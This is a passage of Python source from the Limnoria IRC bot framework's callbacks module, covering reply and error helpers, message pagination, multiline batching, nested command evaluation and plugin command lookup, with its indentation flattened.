checkAtEnd = [commandName]
default = conf.supybot.capabilities.default()
if msg.channel:
channel = msg.channel
checkCapability(ircdb.makeChannelCapability(channel, antiCommand))
chanCommand = ircdb.makeChannelCapability(channel, commandName)
checkAtEnd += [chanCommand]
default &= ircdb.channels.getChannel(channel).defaultAllow
return not (default or \
any(lambda x: ircdb.checkCapability(msg.prefix, x),
checkAtEnd))
except RuntimeError as e:
s = ircdb.unAntiCapability(str(e))
return s
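# Illustrative note (not from the original source): the anti-capabilities
# checked above are the command name prefixed with '-', optionally scoped to a
# channel. For example, giving a user the '-help' capability (or '#chan,-help')
# would make checkCommandCapability deny them the 'help' command globally (or
# only in #chan), assuming the standard ircdb capability naming.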
class RichReplyMethods(object):
"""This is a mixin so these replies need only be defined once. It operates
under several assumptions, including the fact that 'self' is an Irc object
of some sort and there is a self.msg that is an IrcMsg."""
def __makeReply(self, prefix, s):
if s:
s = '%s %s' % (prefix, s)
else:
s = prefix
return ircutils.standardSubstitute(self, self.msg, s)
def _getConfig(self, wrapper):
return conf.get(wrapper,
channel=self.msg.channel, network=self.irc.network)
def replySuccess(self, s='', **kwargs):
r"""Replies with a success message, configurable with
``supybot.replies.success`` or the Success plugin.
:arg str s:
Text to append to the standard success message
:arg \**kwargs:
See :meth:`NestedCommandsIrcProxy.reply`'s keyword arguments
"""
v = self._getConfig(conf.supybot.replies.success)
if v:
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
else:
self.noReply()
def replyError(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.error)
if 'msg' in kwargs:
msg = kwargs['msg']
if ircdb.checkCapability(msg.prefix, 'owner'):
v = self._getConfig(conf.supybot.replies.errorOwner)
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
def _getTarget(self, to=None):
"""Compute the target according to self.to, the provided to,
and self.private, and return it. Mainly used by reply methods."""
# FIXME: Don't set self.to.
# I still set it to be sure I don't introduce a regression,
# but it does not make sense for .reply() and .replies() to
# change the state of this Irc object.
if to is not None:
self.to = self.to or to
if self.private:
target = to or self.msg.nick
elif self.msg.channel is None:
target = self.msg.nick
else:
target = self.to or self.msg.args[0]
return target
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False,
oneToOne=None, **kwargs):
if prefixer is None:
prefixer = ''
if joiner is None:
joiner = utils.str.commaAndify
if isinstance(prefixer, minisix.string_types):
prefixer = prefixer.__add__
if isinstance(joiner, minisix.string_types):
joiner = joiner.join
to = self._getTarget(kwargs.get('to'))
if oneToOne is None: # Can be True, False, or None
if self.irc.isChannel(to):
oneToOne = conf.get(conf.supybot.reply.oneToOne,
channel=to, network=self.irc.network)
else:
oneToOne = conf.supybot.reply.oneToOne()
if oneToOne:
return self.reply(prefixer(joiner(L)), **kwargs)
else:
msg = None
first = True
for s in L:
if onlyPrefixFirst:
if first:
first = False
msg = self.reply(prefixer(s), **kwargs)
else:
msg = self.reply(s, **kwargs)
else:
msg = self.reply(prefixer(s), **kwargs)
return msg
def noReply(self, msg=None):
self.repliedTo = True
def _error(self, s, Raise=False, **kwargs):
if Raise:
raise Error(s)
else:
return self.error(s, **kwargs)
def errorNoCapability(self, capability, s='', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
log.warning('Denying %s for lacking %q capability.',
self.msg.prefix, capability)
# noCapability means "don't send a specific capability error
# message" not "don't send a capability error message at all", like
# one would think
if self._getConfig(conf.supybot.reply.error.noCapability) or \
capability in conf.supybot.capabilities.private():
v = self._getConfig(conf.supybot.replies.genericNoCapability)
else:
v = self._getConfig(conf.supybot.replies.noCapability)
try:
v %= capability
except TypeError: # No %s in string
pass
s = self.__makeReply(v, s)
if s:
return self._error(s, **kwargs)
elif kwargs['Raise']:
raise Error()
def errorPossibleBug(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.possibleBug)
if s:
s += ' (%s)' % v
else:
s = v
return self._error(s, **kwargs)
def errorNotRegistered(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.notRegistered)
return self._error(self.__makeReply(v, s), **kwargs)
def errorNoUser(self, s='', name='that user', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
v = self._getConfig(conf.supybot.replies.noUser)
try:
v = v % name
except TypeError:
log.warning('supybot.replies.noUser should have one "%s" in it.')
return self._error(self.__makeReply(v, s), **kwargs)
def errorRequiresPrivacy(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.requiresPrivacy)
return self._error(self.__makeReply(v, s), **kwargs)
def errorInvalid(self, what, given=None, s='', repr=True, **kwargs):
if given is not None:
if repr:
given = _repr(given)
else:
given = '"%s"' % given
v = _('%s is not a valid %s.') % (given, what)
else:
v = _('That\'s not a valid %s.') % what
if 'Raise' not in kwargs:
kwargs['Raise'] = True
if s:
v += ' ' + s
return self._error(v, **kwargs)
_repr = repr
class ReplyIrcProxy(RichReplyMethods):
"""This class is a thin wrapper around an irclib.Irc object that gives it
the reply() and error() methods (as well as everything in RichReplyMethods,
based on those two)."""
_mores = ircutils.IrcDict()
def __init__(self, irc, msg):
self.irc = irc
self.msg = msg
self.getRealIrc()._setMsgChannel(self.msg)
def getRealIrc(self):
"""Returns the real irclib.Irc object underlying this proxy chain."""
if isinstance(self.irc, irclib.Irc):
return self.irc
else:
return self.irc.getRealIrc()
# This should make us be considered equal to our irclib.Irc object for
# hashing; an important thing (no more "too many open files" exceptions :))
def __hash__(self):
return hash(self.getRealIrc())
def __eq__(self, other):
return self.getRealIrc() == other
__req__ = __eq__
def __ne__(self, other):
return not (self == other)
__rne__ = __ne__
def error(self, s, msg=None, **kwargs):
if 'Raise' in kwargs and kwargs['Raise']:
raise Error()
if msg is None:
msg = self.msg
if s:
m = _makeErrorReply(self, msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def _defaultPrefixNick(self, msg):
if msg.channel:
return conf.get(conf.supybot.reply.withNickPrefix,
channel=msg.channel, network=self.irc.network)
else:
return conf.supybot.reply.withNickPrefix()
def reply(self, s, msg=None, **kwargs):
"""
Keyword arguments:
:arg bool noLengthCheck:
True if the length shouldn't be checked (used for 'more' handling)
:arg bool prefixNick:
False if the nick shouldn't be prefixed to the reply.
:arg bool action:
True if the reply should be an action.
:arg bool private:
True if the reply should be in private.
:arg bool notice:
True if the reply should be noticed when the bot is configured
to do so.
:arg str to:
The nick or channel the reply should go to.
Defaults to msg.args[0] (or msg.nick if private)
:arg bool sendImmediately:
True if the reply should use sendMsg() which
bypasses conf.supybot.protocols.irc.throttleTime
and gets sent before any queued messages
"""
if msg is None:
msg = self.msg
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
kwargs.pop('noLengthCheck', None)
if 'target' not in kwargs:
# TODO: deduplicate this with _getTarget
# TODO: it looks like 'target' is never in kwargs.
# (an old version of this code crashed when 'target' was
# not given, but no one complained). Remove the conditional?
if kwargs.get('private', False) or msg.channel is None:
kwargs['target'] = msg.nick
else:
kwargs['target'] = kwargs.get('to', None) or msg.args[0]
if 'prefixNick' not in kwargs:
kwargs['prefixNick'] = self._defaultPrefixNick(msg)
self._sendReply(s, msg=msg, **kwargs)
def __getattr__(self, attr):
return getattr(self.irc, attr)
def _replyOverhead(self, msg, **kwargs):
"""Returns the number of bytes added to a PRIVMSG payload, either by
Limnoria itself or by the server.
Ignores tag bytes, as they are accounted for separately."""
# FIXME: big hack.
# _makeReply does a lot of internal state computation, especially
# related to the final target to use.
# I tried to get them out of _makeReply but it's a clusterfuck, so I
# gave up. Instead, we call _makeReply with a dummy payload to guess
# what overhead it will add.
payload = 'foo'
channel = msg.channel
msg = copy.deepcopy(msg) # because _makeReply calls .tag('repliedTo')
msg.channel = channel # ugh... copy.deepcopy uses msg.__reduce__
reply_msg = _makeReply(self, msg, payload, **kwargs)
# strip tags, add prefix
reply_msg = ircmsgs.IrcMsg(
msg=reply_msg, server_tags={}, prefix=self.prefix)
return len(str(reply_msg)) - len(payload)
def _sendReply(self, s, target, msg, sendImmediately=False,
noLengthCheck=False, **kwargs):
if sendImmediately:
sendMsg = self.irc.sendMsg
else:
sendMsg = self.irc.queueMsg
if isinstance(self.irc, self.__class__):
s = s[:conf.supybot.reply.maximumLength()]
return self.irc.reply(s,
noLengthCheck=noLengthCheck,
**kwargs)
elif noLengthCheck:
# noLengthCheck only matters to NestedCommandsIrcProxy, so
# it's not used here. Just in case you were wondering.
m = _makeReply(self, msg, s, **kwargs)
sendMsg(m)
return m
else:
s = ircutils.safeArgument(s)
allowedLength = conf.get(conf.supybot.reply.mores.length,
channel=target, network=self.irc.network)
if not allowedLength: # 0 indicates this.
allowedLength = 512 - self._replyOverhead(msg, **kwargs)
maximumMores = conf.get(conf.supybot.reply.mores.maximum,
channel=target, network=self.irc.network)
maximumLength = allowedLength * maximumMores
if len(s) > maximumLength:
log.warning('Truncating to %s bytes from %s bytes.',
maximumLength, len(s))
s = s[:maximumLength]
s_size = len(s.encode()) if minisix.PY3 else len(s)
if s_size <= allowedLength or \
not conf.get(conf.supybot.reply.mores,
channel=target, network=self.irc.network):
# There's no need for action=self.action here because
# action implies noLengthCheck, which has already been
# handled. Let's stick an assert in here just in case.
assert not kwargs.get('action')
m = _makeReply(self, msg, s, **kwargs)
sendMsg(m)
return m
# The '(XX more messages)' suffix may not have the same
# length in the current locale
allowedLength -= len(_('(XX more messages)')) + 1 # bold
chunks = ircutils.wrap(s, allowedLength)
# Last messages to display at the beginning of the list
# (which is used like a stack)
chunks.reverse()
instant = conf.get(conf.supybot.reply.mores.instant,
channel=target, network=self.irc.network)
# Big complex loop ahead, with lots of cases and opportunities for
# off-by-one errors. Here is the meaning of each of the variables
#
# * 'i' is the number of chunks after the current one
#
# * 'is_first' is True when the message is the very first message
# (so last iteration of the loop)
#
# * 'is_last' is True when the message is the very last (so first
# iteration of the loop)
#
# * 'is_instant' is True when the message is in one of the messages
# sent immediately when the command is called, ie. without
# calling @misc more. (when supybot.reply.mores.instant is 1,
# which is the default, this is equivalent to 'is_first')
#
# * 'is_last_instant' is True when the message is the last of the
# instant message (so the first iteration of the loop with an
# instant message).
#
# We need all this complexity because pagination is hard, and we
# want:
#
# * the '(XX more messages)' suffix on the last instant message,
# and every other message (mandatory, it's a great feature),
# but not on the other instant messages (mandatory when
# multiline is enabled, but very nice to have in general)
# * the nick prefix on the first message and every other message
# that isn't instant (mandatory), but not on the other instant
# messages (also mandatory only when multiline is enabled)
msgs = []
for (i, chunk) in enumerate(chunks):
is_first = i == len(chunks) - 1
is_last = i == 0
is_instant = len(chunks) - i <= instant
is_last_instant = len(chunks) - i == instant
if is_last:
# last message, no suffix to add
pass
elif is_instant and not is_last_instant:
# one of the first messages, and the next one will
# also be sent immediately, so no suffix
pass
else:
if i == 1:
more = _('more message')
else:
more = _('more messages')
n = ircutils.bold('(%i %s)' % (len(msgs), more))
chunk = '%s %s' % (chunk, n)
if is_instant and not is_first:
d = kwargs.copy()
d['prefixNick'] = False
msgs.append(_makeReply(self, msg, chunk, **d))
else:
msgs.append(_makeReply(self, msg, chunk, **kwargs))
instant_messages = []
while instant > 0 and msgs:
instant -= 1
response = msgs.pop()
instant_messages.append(response)
# XXX We should somehow allow these to be returned, but
# until someone complains, we'll be fine :) We
# can't return from here, though, for obvious
# reasons.
# return m
if conf.supybot.protocols.irc.experimentalExtensions() \
and 'draft/multiline' in self.state.capabilities_ack \
and len(instant_messages) > 1:
# More than one message to send now, and we are allowed to use
# multiline batches, so let's do it
self.queueMultilineBatches(
instant_messages, target, msg.nick, concat=True,
allowedLength=allowedLength, sendImmediately=sendImmediately)
else:
for instant_msg in instant_messages:
sendMsg(instant_msg)
if not msgs:
return
prefix = msg.prefix
if target and ircutils.isNick(target):
try:
state = self.getRealIrc().state
prefix = state.nickToHostmask(target)
except KeyError:
pass # We'll leave it as it is.
if '!' in prefix and '@' in prefix:
mask = prefix.split('!', 1)[1]
self._mores[mask] = msgs
public = bool(self.msg.channel)
private = kwargs.get('private', False) or not public
self._mores[msg.nick] = (private, msgs)
return response
def queueMultilineBatches(self, msgs, target, targetNick, concat,
allowedLength=0, sendImmediately=False):
"""Queues the msgs passed as argument in batches using draft/multiline
batches.
This errors if experimentalExtensions is disabled or draft/multiline
was not negotiated."""
assert conf.supybot.protocols.irc.experimentalExtensions()
assert 'draft/multiline' in self.state.capabilities_ack
if allowedLength: # 0 indicates this.
largest_msg_size = allowedLength
else:
# Used as upper bound of each message's size to decide how many
# messages to put in each batch.
largest_msg_size = max(len(msg.args[1]) for msg in msgs)
multiline_cap_values = ircutils.parseCapabilityKeyValue(
self.state.capabilities_ls['draft/multiline'])
# All the messages in instant_messages are to be sent
# immediately, in multiline batches.
max_bytes_per_batch = int(multiline_cap_values['max-bytes'])
# We have to honor max_bytes_per_batch, but I don't want to
# encode messages again here just to have their length, so
# let's assume they all have the maximum length.
# It's not optimal, but close enough and simplifies the code.
messages_per_batch = max_bytes_per_batch // largest_msg_size
# "Clients MUST NOT send tags other than draft/multiline-concat and
# batch on messages within the batch. In particular, all client-only
# tags associated with the message must be sent attached to the initial
# BATCH command."
# -- <https://ircv3.net/specs/extensions/multiline>
# So we copy the tags of the first message, discard the tags of all
# other messages, and apply the tags to the opening BATCH
server_tags = msgs[0].server_tags
for batch_msgs in utils.iter.grouper(msgs, messages_per_batch):
# TODO: should use sendBatch instead of queueBatch if
# sendImmediately is True
batch_name = ircutils.makeLabel()
batch = []
batch.append(ircmsgs.IrcMsg(command='BATCH',
args=('+' + batch_name, 'draft/multiline', target),
server_tags=server_tags))
for (i, batch_msg) in enumerate(batch_msgs):
if batch_msg is None:
continue # 'grouper' generates None at the end
assert 'batch' not in batch_msg.server_tags
# Discard the existing tags, and add the batch ones.
batch_msg.server_tags = {'batch': batch_name}
if concat and i > 0:
# Tell clients not to add a newline after this
batch_msg.server_tags['draft/multiline-concat'] = None
batch.append(batch_msg)
batch.append(ircmsgs.IrcMsg(
command='BATCH', args=('-' + batch_name,)))
self.queueBatch(batch)
SimpleProxy = ReplyIrcProxy # Backwards-compatibility
class NestedCommandsIrcProxy(ReplyIrcProxy):
"A proxy object to allow proper nesting of commands (even threaded ones)."
def __init__(self, irc, msg, args, nested=0):
assert isinstance(args, list), 'Args should be a list, not a string.'
super(NestedCommandsIrcProxy, self).__init__(irc, msg)
self.nested = nested
self.repliedTo = False
if not self.nested and isinstance(irc, self.__class__):
# This means we were given an NestedCommandsIrcProxy instead of an
# irclib.Irc, and so we're obviously nested. But nested wasn't
# set! So we take our given Irc's nested value.
self.nested += irc.nested
maxNesting = conf.supybot.commands.nested.maximum()
if maxNesting and self.nested > maxNesting:
log.warning('%s attempted more than %s levels of nesting.',
self.msg.prefix, maxNesting)
self.error(_('You\'ve attempted more nesting than is '
'currently allowed on this bot.'))
return
# The deepcopy here is necessary for Scheduler; it re-runs already
# tokenized commands. There's a possibility a simple copy[:] would
# work, but we're being careful.
self.args = copy.deepcopy(args)
self.counter = 0
self._resetReplyAttributes()
if not args:
self.finalEvaled = True
self._callInvalidCommands()
else:
self.finalEvaled = False
world.commandsProcessed += 1
self.evalArgs()
def __eq__(self, other):
return other == self.getRealIrc()
def __hash__(self):
return hash(self.getRealIrc())
def _resetReplyAttributes(self):
self.to = None
self.action = None
self.notice = None
self.private = None
self.noLengthCheck = None
self.prefixNick = self._defaultPrefixNick(self.msg)
def evalArgs(self, withClass=None):
while self.counter < len(self.args):
self.repliedTo = False
if isinstance(self.args[self.counter], minisix.string_types):
# If it's a string, just go to the next arg. There is no
# evaluation to be done for strings. If, at some point,
# we decided to, say, convert every string using
# ircutils.standardSubstitute, this would be where we would
# probably put it.
self.counter += 1
else:
assert isinstance(self.args[self.counter], list)
# It's a list. So we spawn another NestedCommandsIrcProxy
# to evaluate its args. When that class has finished
# evaluating its args, it will call our reply method, which
# will subsequently call this function again, and we'll
# pick up where we left off via self.counter.
cls = withClass or self.__class__
cls(self, self.msg, self.args[self.counter],
nested=self.nested+1)
# We have to return here because the new NestedCommandsIrcProxy
# might not have called our reply method instantly, since
# its command might be threaded. So (obviously) we can't
# just fall through to self.finalEval.
return
# Once all the list args are evaluated, we then evaluate our own
# list of args, since we're assured that they're all strings now.
assert all(lambda x: isinstance(x, minisix.string_types), self.args)
self.finalEval()
def _callInvalidCommands(self):
log.debug('Calling invalidCommands.')
threaded = False
cbs = []
for cb in self.irc.callbacks:
if hasattr(cb, 'invalidCommand'):
cbs.append(cb)
threaded = threaded or cb.threaded
def callInvalidCommands():
self.repliedTo = False
for cb in cbs:
log.debug('Calling %s.invalidCommand.', cb.name())
try:
cb.invalidCommand(self, self.msg, self.args)
except Error as e:
self.error(str(e))
except Exception as e:
log.exception('Uncaught exception in %s.invalidCommand.',
cb.name())
log.debug('Finished calling %s.invalidCommand.', cb.name())
if self.repliedTo:
log.debug('Done calling invalidCommands: %s.',cb.name())
return
if threaded:
name = 'Thread #%s (for invalidCommands)' % world.threadsSpawned
t = world.SupyThread(target=callInvalidCommands, name=name)
t.setDaemon(True)
t.start()
else:
callInvalidCommands()
def findCallbacksForArgs(self, args):
"""Returns a two-tuple of (command, plugins) that has the command
(a list of strings) and the plugins for which it was a command."""
assert isinstance(args, list)
args = list(map(canonicalName, args))
# Find a list maxL such that maxL = args[0:n] for the largest n
# possible such that maxL is a command.
cbs = []
maxL = []
for cb in self.irc.callbacks:
if not hasattr(cb, 'getCommand'):
continue
L = cb.getCommand(args)
if L and L >= maxL:
# equivalent to "L and len(L) >= len(maxL)", because L and maxL
# are both "prefixes" of the same list.
maxL = L
cbs.append((cb, L))
assert isinstance(L, list), \
'getCommand now returns a list, not a method.'
assert utils.iter.startswith(L, args), \
'getCommand must return a prefix of the args given. ' \
'(args given: %r, returned: %r)' % (args, L)
log.debug('findCallbacksForArgs: %r', cbs)
# Filter out all the entries in cbs that are smaller than maxL (ie.
# maxL contains them, with more items at the end.)
cbs = [cb for (cb, L) in cbs if L == maxL]
if len(maxL) == 1:
# Special case: one arg determines the callback. In this case, we
# have to check, in order:
# 1. Whether the arg is the same as the name of a callback. This
# callback would then win.
for cb in cbs:
if cb.canonicalName() == maxL[0]:
return (maxL, [cb])
# 2. Whether a defaultplugin is defined.
defaultPlugins = conf.supybot.commands.defaultPlugins
try:
defaultPlugin = defaultPlugins.get(maxL[0])()
log.debug('defaultPlugin: %r', defaultPlugin)
if defaultPlugin:
cb = self.irc.getCallback(defaultPlugin)
if cb in cbs:
# This is just a sanity check, but there's a small
# possibility that a default plugin for a command
# is configured to point to a plugin that doesn't
# actually have that command.
return (maxL, [cb])
except registry.NonExistentRegistryEntry:
pass
# 3. Whether an importantPlugin is one of the responses.
important = defaultPlugins.importantPlugins()
important = list(map(canonicalName, important))
importants = []
for cb in cbs:
if cb.canonicalName() in important:
importants.append(cb)
if len(importants) == 1:
return (maxL, importants)
return (maxL, cbs)
def finalEval(self):
# Now that we've already iterated through our args and made sure
# that any list of args was evaluated (by spawning another
# NestedCommandsIrcProxy to evaluate it into a string), we can finally
# evaluate our own list of arguments.
assert not self.finalEvaled, 'finalEval called twice.'
self.finalEvaled = True
# Now, the way we call a command is we iterate over the loaded plugins,
# asking each one if the list of args we have interests it. The
# way we do that is by calling getCommand on the plugin.
# The plugin will return a list of args which it considers to be
# "interesting." We will then give our args to the plugin which
# has the *longest* list. The reason we pick the longest list is
# that it seems reasonable that the longer the list, the more
# specific the command is. That is, given a list of length X, a list
# of length X+1 would be even more specific (assuming that both lists
# used the same prefix). Of course, if two plugins return a list of the
# same length, we'll just error out with a message about ambiguity.
(command, cbs) = self.findCallbacksForArgs(self.args)
if not cbs:
# We used to handle addressedRegexps here, but I think we'll let
# them handle themselves in getCommand. They can always just
# return the full list of args as their "command".
self._callInvalidCommands()
elif len(cbs) > 1:
names = sorted([cb.name() for cb in cbs])
command = formatCommand(command)
self.error(format(_('The command %q is available in the %L '
'plugins. Please specify the plugin '
'whose command you wish to call by using '
'its name as a command before %q.'),
command, names, command))
else:
cb = cbs[0]
args = self.args[len(command):]
if world.isMainThread() and \
(cb.threaded or conf.supybot.debug.threadAllCommands()):
t = CommandThread(target=cb._callCommand,
args=(command, self, self.msg, args))
t.start()
else:
cb._callCommand(command, self, self.msg, args)
def reply(self, s, noLengthCheck=False, prefixNick=None, action=None,
private=None, notice=None, to=None, msg=None,
sendImmediately=False, stripCtcp=True):
# These use and or or based on whether or not they default to True or
# False. Those that default to True use and; those that default to
# False use or.
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
self.repliedTo = True
if msg is None:
msg = self.msg
if prefixNick is not None:
self.prefixNick = prefixNick
if action is not None:
self.action = self.action or action
if action:
self.prefixNick = False
self.noLengthCheck = True
if notice is not None:
self.notice = self.notice or notice
if private is not None:
self.private = self.private or private
target = self._getTarget(to)
# action=True implies noLengthCheck=True and prefixNick=False
self.noLengthCheck=noLengthCheck or self.noLengthCheck or self.action
if not isinstance(s, minisix.string_types): # avoid trying to str() unicode
s = str(s) # Allow non-string esses.
if self.finalEvaled:
try:
self._sendReply(
s=s, target=target, msg=msg,
to=self.to,
notice=self.notice,
action=self.action,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp,
noLengthCheck=self.noLengthCheck,
sendImmediately=sendImmediately,
)
except:
log.exception('Error while sending reply')
raise
finally:
self._resetReplyAttributes()
else:
if msg.ignored:
# Since the final reply string is constructed via
# ' '.join(self.args), the args index for ignored commands
# needs to be popped to avoid extra spaces in the final reply.
self.args.pop(self.counter)
msg.tag('ignored', False)
else:
self.args[self.counter] = s
self.evalArgs()
def noReply(self, msg=None):
if msg is None:
msg = self.msg
super(NestedCommandsIrcProxy, self).noReply(msg=msg)
if self.finalEvaled:
if isinstance(self.irc, NestedCommandsIrcProxy):
self.irc.noReply(msg=msg)
else:
msg.tag('ignored', True)
else:
self.args.pop(self.counter)
msg.tag('ignored', False)
self.evalArgs()
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False, to=None,
oneToOne=None, **kwargs):
if not self.finalEvaled and oneToOne is None:
oneToOne = True
return super(NestedCommandsIrcProxy, self).replies(L,
prefixer=prefixer, joiner=joiner,
onlyPrefixFirst=onlyPrefixFirst, to=to,
oneToOne=oneToOne, **kwargs)
def error(self, s='', Raise=False, **kwargs):
r"""Replies with an error.
:arg str s:
The error message
:arg bool Raise:
If True, this will raise :class:`Error` that will propagate so
that the caller of this function immediately terminates
:arg \**kwargs:
See :meth:`NestedCommandsIrcProxy.reply`'s keyword arguments
"""
self.repliedTo = True
if Raise:
raise Error(s)
if not isinstance(self.irc, irclib.Irc):
return self.irc.error(s, **kwargs)
elif s:
m = _makeErrorReply(self, self.msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def __getattr__(self, attr):
return getattr(self.irc, attr)
IrcObjectProxy = NestedCommandsIrcProxy
class CommandThread(world.SupyThread):
"""Just does some extra logging and error-recovery for commands that need
to run in threads.
"""
def __init__(self, target=None, args=(), kwargs={}):
self.command = args[0]
self.cb = target.__self__
threadName = 'Thread #%s (for %s.%s)' % (world.threadsSpawned,
self.cb.name(),
self.command)
log.debug('Spawning thread %s (args: %r)', threadName, args)
self.__parent = super(CommandThread, self)
self.__parent.__init__(target=target, name=threadName,
args=args, kwargs=kwargs)
self.setDaemon(True)
self.originalThreaded = self.cb.threaded
self.cb.threaded = True
def run(self):
try:
self.__parent.run()
finally:
self.cb.threaded = self.originalThreaded
class CommandProcess(world.SupyProcess):
"""Just does some extra logging and error-recovery for commands that need
to run in processes.
"""
def __init__(self, target=None, args=(), kwargs={}):
pn = kwargs.pop('pn', 'Unknown')
cn = kwargs.pop('cn', 'unknown')
procName = 'Process #%s (for %s.%s)' % (world.processesSpawned,
pn,
cn)
log.debug('Spawning process %s (args: %r)', procName, args)
self.__parent = super(CommandProcess, self)
self.__parent.__init__(target=target, name=procName,
args=args, kwargs=kwargs)
def run(self):
self.__parent.run()
class CanonicalString(registry.NormalizedString):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameSet(utils.NormalizingSet):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameDict(utils.InsensitivePreservingDict):
def key(self, s):
return canonicalName(s)
class Disabled(registry.SpaceSeparatedListOf):
sorted = True
Value = CanonicalString
List = CanonicalNameSet
conf.registerGlobalValue(conf.supybot.commands, 'disabled',
Disabled([], _("""Determines what commands are currently disabled. Such
commands will not appear in command lists, etc. They will appear not even
to exist.""")))
class DisabledCommands(object):
def __init__(self):
self.d = CanonicalNameDict()
for name in conf.supybot.commands.disabled():
if '.' in name:
(plugin, command) = name.split('.', 1)
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
else:
self.d[name] = None
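    # Illustrative registry values handled by __init__ above (hypothetical
    # names): an entry in supybot.commands.disabled may be a bare command name
    # such as "rot13", which disables it in every plugin, or a plugin-qualified
    # name such as "Filter.rot13", which disables it only in that plugin.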
def disabled(self, command, plugin=None):
if command in self.d:
if self.d[command] is None:
return True
elif plugin in self.d[command]:
return True
return False
def add(self, command, plugin=None):
if plugin is None:
self.d[command] = None
else:
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
def remove(self, command, plugin=None):
if plugin is None:
del self.d[command]
else:
if self.d[command] is not None:
self.d[command].remove(plugin)
class BasePlugin(object):
def __init__(self, *args, **kwargs):
self.cbs = []
for attr in dir(self):
if attr != canonicalName(attr):
continue
obj = getattr(self, attr)
if isinstance(obj, type) and issubclass(obj, BasePlugin):
cb = obj(*args, **kwargs)
setattr(self, attr, cb)
self.cbs.append(cb)
cb.log = log.getPluginLogger('%s.%s' % (self.name(),cb.name()))
super(BasePlugin, self).__init__()
class MetaSynchronizedAndFirewalled(log.MetaFirewall, utils.python.MetaSynchronized):
pass
SynchronizedAndFirewalled = MetaSynchronizedAndFirewalled(
'SynchronizedAndFirewalled', (), {})
class Commands(BasePlugin, SynchronizedAndFirewalled):
__synchronized__ = (
'__call__',
'callCommand',
'invalidCommand',
)
# For a while, a comment stood here to say, "Eventually callCommand." But
# that's wrong, because we can't do generic error handling in this
# callCommand -- plugins need to be able to override callCommand and do
# error handling there (see the Web plugin for an example).
__firewalled__ = {'isCommand': None,
'_callCommand': None}
commandArgs = ['self', 'irc', 'msg', 'args']
# These must be class-scope, so all plugins use the same one.
_disabled = DisabledCommands()
pre_command_callbacks = []
def name(self):
"""Returns the name of this Commands object (usually the plugin
name)."""
return self.__class__.__name__
def canonicalName(self):
"""Same as :py:meth:`name`, but normalized."""
return canonicalName(self.name())
def isDisabled(self, command):
"""Returns whether the given ``command`` is disabled."""
return self._disabled.disabled(command, self.name())
def isCommandMethod(self, name):
"""Returns whether a given method name is a command in this plugin.
Plugins only need to implement this if they have a dynamic set of
commands."""
# This function is ugly, but I don't want users to call methods like
# doPrivmsg or __init__ or whatever, and this is good to stop them.
# Don't normalize this name: consider outFilter(self, irc, msg).
# name = canonicalName(name)
if self.isDisabled(name):
return False
if name != canonicalName(name):
return False
if hasattr(self, name):
method = getattr(self, name)
if inspect.ismethod(method):
code = method.__func__.__code__
return inspect.getargs(code)[0] == self.commandArgs
else:
return False
else:
return False
def isCommand(self, command):
"""Convenience, backwards-compatibility, semi-deprecated."""
if isinstance(command, minisix.string_types):
return self.isCommandMethod(command)
else:
# Since we're doing a little type dispatching here, let's not be
# too liberal.
assert isinstance(command, list)
return self.getCommand(command) == command
def getCommand(self, args, stripOwnName=True):
"""Among all the commands in this Commands object, recursively
        searches for the command whose name is the longest substring
        of ``args``, and returns its name, split on spaces."""
assert args == list(map(canonicalName, args))
first = args[0]
for cb in self.cbs:
if first == cb.canonicalName():
return cb.getCommand(args)
if first == self.canonicalName() and len(args) > 1 and \
stripOwnName:
ret = self.getCommand(args[1:], stripOwnName=False)
if ret:
return [first] + ret
if self.isCommandMethod(first):
return [first]
return []
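    # Illustrative lookup (assumed plugin/command names): for a plugin "Google"
    # defining a "search" command, getCommand(['google', 'search', 'foo'])
    # resolves to ['google', 'search'], getCommand(['search', 'foo']) resolves
    # to ['search'], and unknown tokens yield [].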
def getCommandMethod(self, command):
"""Gets the given command from this plugin, using
:py:meth:`getCommand`.
Plugins only need to implement this if they have a dynamic set of
commands."""
#print '*** %s.getCommandMethod(%r)' % (self.name(), command)
assert not isinstance(command, minisix.string_types)
assert command == list(map(canonicalName, command))
assert self.getCommand(command) == command
for cb in self.cbs:
if command[0] == cb.canonicalName():
return cb.getCommandMethod(command)
if len(command) > 1:
assert command[0] == self.canonicalName()
return self.getCommandMethod(command[1:])
else:
method = getattr(self, command[0])
if inspect.ismethod(method):
code = method.__func__.__code__
if inspect.getargs(code)[0] == self.commandArgs:
return method
else:
raise AttributeError
def listCommands(self, pluginCommands=[]):
"""List all the commands in this ``Commands`` object.
Plugins only need to implement this if they have a dynamic set of
commands."""
commands = set(pluginCommands)
for s in dir(self):
if self.isCommandMethod(s):
commands.add(s)
for cb in self.cbs:
name = cb.canonicalName()
for command in cb.listCommands():
if command == name:
commands.add(command)
else:
commands.add(' '.join([name, command]))
L = list(commands)
L.sort()
return L
def callCommand(self, command, irc, msg, *args, **kwargs):
"""Given a command name, gets the method with
:py:meth:`getCommandMethod` and calls it."""
# We run all callbacks before checking if one of them returned True
if any(bool, list(cb(self, command, irc, msg, *args, **kwargs)
for cb in self.pre_command_callbacks)):
return
method = self.getCommandMethod(command)
method(irc, msg, *args, **kwargs)
def _callCommand(self, command, irc, msg, *args, **kwargs):
if irc.nick == msg.args[0]:
self.log.info('%s called in private by %q.', formatCommand(command),
msg.prefix)
else:
self.log.info('%s called on %s by %q.', formatCommand(command),
msg.args[0], msg.prefix)
try:
